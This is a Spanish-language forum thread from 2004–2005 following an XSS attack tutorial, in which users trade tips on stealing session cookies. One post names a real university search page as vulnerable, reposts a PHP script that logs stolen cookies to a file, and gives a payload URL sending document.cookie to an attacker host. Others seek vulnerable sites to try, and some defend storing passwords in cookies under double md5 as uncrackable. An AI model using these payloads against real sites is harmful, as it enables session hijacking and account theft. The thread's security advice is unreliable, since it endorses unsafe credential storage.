[::Tutorial::] - Ataques XSS

Firos · 5 Junio 2004, 01:08 AM

Ok ok, muchas gracias, mas o menos tenia la idea

Salu2..

-Riven-Ward- · 14 Julio 2004, 13:33 PM

Pido perdón por revivir este post un poco viejo, pero releyendolo me dí cuenta de algo:

Cita de: neohex en 24 Mayo 2004, 06:24 AM
poniendote el ejemplo de mi website:
yo cuando un usuario se loggea coloco dos cookies:
-Una con su nombre de usuario
-Otra con su password

a la primera la llamo n_user y a la segunda n_pass y si me hago el atako a mi mismo -> los valores que me dan(en el archivo.txt) son de esta forma:
n_user=neohex; n_pass=123456

Hace poco hice mi Sistema de Registro de users, y guardaba la cookie con el nombre del user y su contraseña.

Luego me dí cuenta de que si "algún hacker" entra en el PC de alguno de mis users, lo primero (o una de las primeras) cosas que hará sería ir a ver las Cookies, entonces obtendría la contraseña del user.

Y tomando en cuenta eso, supongo que las páginas importantes o los programadores "inteligentes" no guardarían la contraseña en una Cookie...

PD: neohex, te recomiendo que también dejes de guardar la contraseña en una Cookie

Rentero · 15 Julio 2004, 04:40 AM

Haber, mientras la contraseña esté bien cifrada no hay problema por el simple hecho de que si entra una persona en el pc de un user de tu website no creo que lo que vaya ha buscar sea precisamente la cookie de tu web, creo que se preocuparia por buscar otras cosas (como el archivo SAM y cosas mas importantes).

Ademas, es un riesgo que todo webmaster debe correr xD.

P.D: También hay que tener en cuenta que tu debes preocuparte de la seguridad de tu página web lo mismo que cada usuario debe preocuparse de la seguridad de su pc.
-Como mucho si alguien consigue la cookie de un usuario de mi web y le loggea como tal lo mas que podrá hacer es hacerse pasar por ese usuario...no por ello va a tener mas privilegios ni nada por el estilo...como mucho llenará de basura las noticias, el foro, etc....y para eso está el limitar los mensajes que puede poner un mismo usuario cada cierto tiempo.

P.D2: Preocupate por hacer tu web lo mas segura posible, que lo demas ya viene solo.

-Riven-Ward- · 17 Julio 2004, 05:09 AM

Cita de: neohex en 15 Julio 2004, 04:40 AM
Ademas, es un riesgo que todo webmaster debe correr xD.

--------

-Como mucho si alguien consigue la cookie de un usuario de mi web y le loggea como tal lo mas que podrá hacer es hacerse pasar por ese usuario...no por ello va a tener mas privilegios ni nada por el estilo...como mucho llenará de basura las noticias, el foro, etc....y para eso está el limitar los mensajes que puede poner un mismo usuario cada cierto tiempo.

1- No es necesario poner la contraseña en la cookie, no sirve de mucho $:-\$

2- Mucha, MUCHA gente usa la misma contraseña para casi todas sus cosas, y el "hacker" seguramente pensará en eso

.

Salu2!

Rentero · 17 Julio 2004, 05:19 AM

Haber Riven tio.....que manía tienes con quedarte encima mia xDDD.

Te explico:
-Tienes que poner la contraseña en la cookie porque si pones solo el nombre de usuario cualquiera puede cambiar su cookie y poner el nombre del administrador con lo cual ya se ha saltado tu sistema......

Te repito que si alguien entra en tu pc no va ha ir precisamente a por la cookie de tu web, se encargará de hacer cosas "mas bonitas".

P.D: Mientras le pases md5(md5($pass)); es suficiente...por lo menos eso ya es incrackeable(por fuerza bruta, siempre que la contraseña sea de una longitud considerable.)

joserra89 · 15 Septiembre 2004, 08:03 AM

Una cosa, todavia no e encontrado una web vulnerable, e buscado en todos mis favoritos y todos los buscadores no me dan la alerta, alguien sabe algun site que tenga el fallo ??? ??? ???

9reynas · 10 Noviembre 2004, 11:03 AM

debido a lo antiguo de este no se si daran respuesta bueno encontre una direccion que es vulnerable
http://campusvirtual.uma.es/ihj/_contenidos/buscador.php
bueno le das a <script>alert()</script> y te salta la alerta ,, asiq uebueno
umm cheque las fuentes y ....
<form action="" method="post">
<input type="text" name="search_term" size="40" maxlength="40" value="">
<input type="submit" value="Buscar">
</form>
como se daran cuenta este form no tiene ni nombre y el boton de envio tampoco tiene nombre mi pregunta es como quedaria la web a la que le tendrian que linkear los demas
que hago remmplazo los espacios de los nombres con espacios vacios osea nada ??????????..............
asi ademas esta web no tiene sistema de usuarios pero me queda la duda de como seria la direccionm aligna como dice neo hex

thank por las respuestas 9reynas

9reynas · 10 Noviembre 2004, 11:37 AM

respondiendole al tioq ue posteoun poco mas arriba basta con poner buscador.php en google

bueno checando mejor esto se me ocurre algoo mas el script de cokies.phpcomo se ve en su variable $cokie hace la peticion de la cokie

cookies.php

Código:
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>

ahora viene so esta claro lo del archivo.txt que se deposita la cokie alli tambiene sta caro
pero en esta url
Código:
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;

hasta donde me dan mis pobrees conocimientos de cgi cuando se pasa una consulata a un formulario los datos introducidos se pasan como despues del scrip cgi en este formato lawe.com/script.cgi?nombre=valor&nombre1=valor1 etc etc dependiendo d elos campos del form

aqui mi duda entonces l primer cgi seria buscador.php

ahora la primera pareja seria
palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>

y la segunda pareja seria
buscar=;

ahora analizando la primera pareja checamos esta parte
'http://www.atacante.com/cookies.php?cookie='+document.cookie

ahora en esto el cgi seria cookies.php
y su pareja seria cookie='+document.cookie

ahora sia lguien postea las fuentes de buscador.php seria buenisimo igual la voya buscar supongo que eso nos aclararia bastante loq ue hace esa url

buenoo voya buscar ciao
9reynas
de ante mano si me equivoco en algo corriganme y nada salu2

Adept · 12 Noviembre 2004, 02:18 AM

Si la página esn vez de estar hecha en php está hecha en cfml, ¿cómo quedaría el código del archivo?

Falso Positivo · 15 Agosto 2005, 23:02 PM

Aca el nombre del formulario seria 'formul'
Pero el nombre del boton?????
cual es???

Código [Seleccionar]

<tr>
<form name="formul" method="get" action="../home/search.php">
    <td><img src="images/spacer.gif" width="5"></td>
    <td><input type="text" id="palabras" name="palabras" class="campo" size="31" value=""></td>
    <td><img src="images/spacer.gif" width="3"></td>
    <td width="65" align="center"><a href="javascript:document.formul.submit();" onClick="document.formul.submit();"><img src="../home/X2x.gif" vspace="2" width="60" height="18" border="0"></a></td>
</form>

Salu2.